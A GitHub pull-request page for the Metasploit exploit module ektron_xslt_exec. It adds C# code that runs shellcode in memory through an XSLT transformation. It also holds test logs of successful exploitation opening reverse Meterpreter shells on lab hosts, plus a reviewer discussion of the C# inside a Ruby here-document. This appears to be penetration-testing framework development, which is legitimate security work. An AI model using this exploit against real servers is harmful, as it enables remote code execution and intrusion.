Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

added c# code by Nicolas Gregoire #1156

Merged
merged 1 commit into from Dec 11, 2012
Merged

added c# code by Nicolas Gregoire #1156

merged 1 commit into from Dec 11, 2012

Conversation

jvazquez-r7
Copy link
Contributor

Used the C# code by Nicolas Gregoire to avoid dropping shellcode to filesystem. See:

https://dev.metasploit.com/redmine/issues/6784

Nicolas credited in the module too.

Test:

msf > use exploit/windows/http/ektron_xslt_exec 
msf  exploit(ektron_xslt_exec) > reload
[*] Reloading module...
msf  exploit(ektron_xslt_exec) > set RHOST 192.168.1.139
RHOST => 192.168.1.139
msf  exploit(ektron_xslt_exec) > check
[+] The target is vulnerable.
msf  exploit(ektron_xslt_exec) > exploit

[*] Started reverse handler on 192.168.1.129:4444 
[*] Generating the EXE Payload and the XSLT...
[*] Trying to run the xslt transformation...
[+] Exploitation was successful
[*] Sending stage (752128 bytes) to 192.168.1.139
[*] Meterpreter session 1 opened (192.168.1.129:4444 -> 192.168.1.139:2090) at 2012-12-11 16:32:43 +0100

meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit 
[*] Shutting down Meterpreter...

[*] 192.168.1.139 - Meterpreter session 1 closed.  Reason: User exit

brandonprry
brandonprry reviewed Dec 11, 2012
View reviewed changes
modules/exploits/windows/http/ektron_xslt_exec.rb
IntPtr pinfo = IntPtr.Zero;
UInt32 threadId = 0;
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
return "#{fingerprint}";
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

why not just return fingerprint? fingerpring is already a string...

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

you might have missed this is C# code inside a here-document in Ruby code. The #{fingerprint} thing will be replaced by ruby, therefore generating C# code like

return "Blahblah";

which will in turn be compiled by the XSLT processor and rendered into the result XML for verification of successful exploit.

return fingerprint;

at that place will create a stylesheet compilation error as there is no C# variable named fingerprint in this sample code.

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

You are correct, I did.

@wchen-r7
Copy link
Contributor

This will take me some time to verify. I shoulda made a snapshot for this....

@wchen-r7
Copy link
Contributor

tested:

[*] Started reverse handler on 10.0.1.3:4444 
[*] Generating the EXE Payload and the XSLT...
[*] Trying to run the xslt transformation...
[+] Exploitation was successful
[*] Sending stage (752128 bytes) to 10.0.1.10
[*] Meterpreter session 1 opened (10.0.1.3:4444 -> 10.0.1.10:1071) at 2012-12-11 12:43:21 -0600

meterpreter >

@wchen-r7 wchen-r7 merged commit 2eb4de8 into rapid7:master Dec 11, 2012
@Meatballs1 Meatballs1 mentioned this pull request Jul 19, 2013
Closed
@jvazquez-r7 jvazquez-r7 deleted the ektron_xslt_exec_nicob branch November 18, 2014 15:46
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
4 participants
@jvazquez-r7 @wchen-r7 @brandonprry @schierlm